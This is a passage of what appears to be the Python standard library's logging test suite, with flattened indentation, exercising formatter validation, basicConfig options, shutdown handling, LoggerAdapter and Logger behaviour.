f = logging.Formatter("${asctime} - $message", style="$")
self.assertEqual(f._fmt, "${asctime} - $message")
f = logging.Formatter("$bar $$", style="$")
self.assertEqual(f._fmt, "$bar $$")
f = logging.Formatter("$bar $$$$", style="$")
self.assertEqual(f._fmt, "$bar $$$$") # this would print two $($$)
        # Test that ValueError is raised for incorrect formats
# Percentage Style
self.assertRaises(ValueError, logging.Formatter, "%(asctime)Z")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)b")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)*")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)*3s")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)_")
self.assertRaises(ValueError, logging.Formatter, '{asctime}')
self.assertRaises(ValueError, logging.Formatter, '${message}')
self.assertRaises(ValueError, logging.Formatter, '%(foo)#12.3*f') # with both * and decimal number as precision
self.assertRaises(ValueError, logging.Formatter, '%(foo)0*.8*f')
# StrFormat Style
# Testing failure for '-' in field name
self.assert_error_message(
ValueError,
"invalid field name/expression: 'name-thing'",
logging.Formatter, "{name-thing}", style="{"
)
# Testing failure for style mismatch
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, '%(asctime)s', style='{'
)
# Testing failure for invalid conversion
self.assert_error_message(
ValueError,
"invalid conversion: 'Z'"
)
self.assertRaises(ValueError, logging.Formatter, '{asctime!s:#30,15f}', style='{')
self.assert_error_message(
ValueError,
"invalid format: expected ':' after conversion specifier",
logging.Formatter, '{asctime!aa:15}', style='{'
)
# Testing failure for invalid spec
self.assert_error_message(
ValueError,
"bad specifier: '.2ff'",
logging.Formatter, '{process:.2ff}', style='{'
)
self.assertRaises(ValueError, logging.Formatter, '{process:.2Z}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:<##30,12g}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:<#30#,12g}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:{{w}},{{p}}}', style='{')
# Testing failure for mismatch braces
self.assert_error_message(
ValueError,
"invalid format: unmatched '{' in format spec",
logging.Formatter, '{process', style='{'
)
self.assert_error_message(
ValueError,
"invalid format: unmatched '{' in format spec",
logging.Formatter, 'process}', style='{'
)
self.assertRaises(ValueError, logging.Formatter, '{{foo!r:4.2}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{{foo!r:4.2}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo/bar}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo:{{w}}.{{p}}}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!X:{{w}}.{{p}}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:random}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:ran{dom}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:ran{d}om}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo.!a:d}', style='{')
# Dollar style
# Testing failure for mismatch bare $
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, '$bar $$$', style='$'
)
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, 'bar $', style='$'
)
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, 'foo $.', style='$'
)
# Testing failure for mismatch style
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, '{asctime}', style='$'
)
self.assertRaises(ValueError, logging.Formatter, '%(asctime)s', style='$')
# Testing failure for incorrect fields
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, 'foo', style='$'
)
self.assertRaises(ValueError, logging.Formatter, '${asctime', style='$')
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
def test_default_msec_format_none(self):
class NoMsecFormatter(logging.Formatter):
default_msec_format = None
default_time_format = '%d/%m/%Y %H:%M:%S'
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 123, utc)
r.created = time.mktime(dt.astimezone(None).timetuple())
f = NoMsecFormatter()
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '21/04/1993 08:03:00')
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
with support.captured_stderr() as stderr:
root.debug('This should not appear')
self.assertEqual(stderr.getvalue(), '')
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), 'Final chance!\n')
# No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
with support.captured_stderr() as stderr:
root.warning('Final chance!')
msg = 'No handlers could be found for logger "root"\n'
self.assertEqual(stderr.getvalue(), msg)
# 'No handlers' message only printed once
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
# If raiseExceptions is False, no message is printed
root.manager.emittedNoHandlerWarning = False
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
finally:
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
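# Stand-in handler for ShutdownTest: each lifecycle method (acquire, flush,
# close, release) simply records that it was called, so logging.shutdown()
# ordering and error handling can be checked without real handlers.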
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', OSError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', OSError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', OSError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
self.assertRaises(ValueError, logging.disable, "doesnotexists")
class _NotAnIntOrString:
pass
self.assertRaises(TypeError, logging.disable, _NotAnIntOrString())
logging.disable("WARN")
# test the default value introduced in 3.7
# (Issue #28524)
logging.disable()
self.assertEqual(logging.root.manager.disable, logging.CRITICAL)
def _test_log(self, method, level=None):
called = []
support.patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
def test_subclass_logger_cache(self):
# bpo-37258
message = []
class MyLogger(logging.getLoggerClass()):
def __init__(self, name='MyLogger', level=logging.NOTSET):
super().__init__(name, level)
message.append('initialized')
logging.setLoggerClass(MyLogger)
logger = logging.getLogger('just_some_logger')
self.assertEqual(message, ['initialized'])
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger.addHandler(h)
try:
logger.setLevel(logging.DEBUG)
logger.debug("hello")
self.assertEqual(stream.getvalue().strip(), "hello")
stream.truncate(0)
stream.seek(0)
logger.setLevel(logging.INFO)
logger.debug("hello")
self.assertEqual(stream.getvalue(), "")
finally:
logger.removeHandler(h)
h.close()
logging.setLoggerClass(logging.Logger)
def test_logging_at_shutdown(self):
# Issue #20037
code = """if 1:
import logging
class A:
def __del__(self):
try:
raise ValueError("some error")
except Exception:
logging.exception("exception in __del__")
a = A()"""
rc, out, err = assert_python_ok("-c", code)
err = err.decode()
self.assertIn("exception in __del__", err)
self.assertIn("ValueError: some error", err)
def test_recursion_error(self):
# Issue 36272
code = """if 1:
import logging
def rec():
logging.error("foo")
rec()
rec()"""
rc, out, err = assert_python_failure("-c", code)
err = err.decode()
self.assertNotIn("Cannot recover from stack overflow.", err)
self.assertEqual(rc, 1)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.setLevel(self.original_logging_level)
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='%(asctime)s - %(message)s')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, '%(asctime)s - %(message)s')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
# Issue 23207: test for invalid kwargs
assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
# Should pop both filename and filemode even if filename is None
logging.basicConfig(filename=None, filemode='a')
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def test_force(self):
old_string_io = io.StringIO()
new_string_io = io.StringIO()
old_handlers = [logging.StreamHandler(old_string_io)]
new_handlers = [logging.StreamHandler(new_string_io)]
logging.basicConfig(level=logging.WARNING, handlers=old_handlers)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
logging.basicConfig(level=logging.INFO, handlers=new_handlers,
force=True)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
self.assertEqual(old_string_io.getvalue().strip(),
'WARNING:root:warn')
self.assertEqual(new_string_io.getvalue().strip(),
'WARNING:root:warn\nINFO:root:info')
def test_encoding(self):
try:
encoding = 'utf-8'
logging.basicConfig(filename='test.log', encoding=encoding,
errors='strict',
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data,
'The Øresund Bridge joins Copenhagen to Malmö')
def test_encoding_errors(self):
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
errors='ignore',
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data, 'The resund Bridge joins Copenhagen to Malm')
def test_encoding_errors_default(self):
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
self.assertEqual(handler.errors, 'backslashreplace')
logging.debug('😂: ☃️: The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data, r'\U0001f602: \u2603\ufe0f: The \xd8resund '
r'Bridge joins Copenhagen to Malm\xf6')
def test_encoding_errors_none(self):
# Specifying None should behave as 'strict'
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
errors=None,
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
self.assertIsNone(handler.errors)
message = []
def dummy_handle_error(record):
_, v, _ = sys.exc_info()
message.append(str(v))
handler.handleError = dummy_handle_error
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
self.assertTrue(message)
self.assertIn("'ascii' codec can't encode "
"character '\\xd8' in position 4:", message[0])
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
# didn't write anything due to the encoding error
self.assertEqual(data, r'')
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
def test_nested(self):
class Adapter(logging.LoggerAdapter):
prefix = 'Adapter'
def process(self, msg, kwargs):
return f"{self.prefix} {msg}", kwargs
msg = 'Adapters can be nested, yo.'
adapter = Adapter(logger=self.logger, extra=None)
adapter_adapter = Adapter(logger=adapter, extra=None)
adapter_adapter.prefix = 'AdapterAdapter'
self.assertEqual(repr(adapter), repr(adapter_adapter))
adapter_adapter.log(logging.CRITICAL, msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, f"Adapter AdapterAdapter {msg}")
self.assertEqual(record.args, (self.recording,))
orig_manager = adapter_adapter.manager
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
temp_manager = object()
try:
adapter_adapter.manager = temp_manager
self.assertIs(adapter_adapter.manager, temp_manager)
self.assertIs(adapter.manager, temp_manager)
self.assertIs(self.logger.manager, temp_manager)
finally:
adapter_adapter.manager = orig_manager
self.assertIs(adapter_adapter.manager, orig_manager)
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
with support.swap_attr(logging, 'raiseExceptions', True):
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
with support.swap_attr(logging, 'raiseExceptions', False):
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_find_caller_with_stacklevel(self):
the_level = 1
def innermost():
self.logger.warning('test', stacklevel=the_level)
def inner():
innermost()
def outer():
inner()
records = self.recording.records
outer()
self.assertEqual(records[-1].funcName, 'innermost')
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'inner')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'outer')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'test_find_caller_with_stacklevel')
self.assertGreater(records[-1].lineno, lineno)
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_is_enabled_for_disabled_logger(self):
old_disabled = self.logger.disabled
old_disable = self.logger.manager.disable
self.logger.disabled = True
self.logger.manager.disable = 21
self.addCleanup(setattr, self.logger, 'disabled', old_disabled)
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('root'))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
def test_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in ('', 'root', 'foo', 'foo.bar', 'baz.bar'):
logger = logging.getLogger(name)
s = pickle.dumps(logger, proto)
unpickled = pickle.loads(s)
self.assertIs(unpickled, logger)
def test_caching(self):
root = self.root_logger
logger1 = logging.getLogger("abc")
logger2 = logging.getLogger("abc.def")
# Set root logger level and ensure cache is empty
root.setLevel(logging.ERROR)
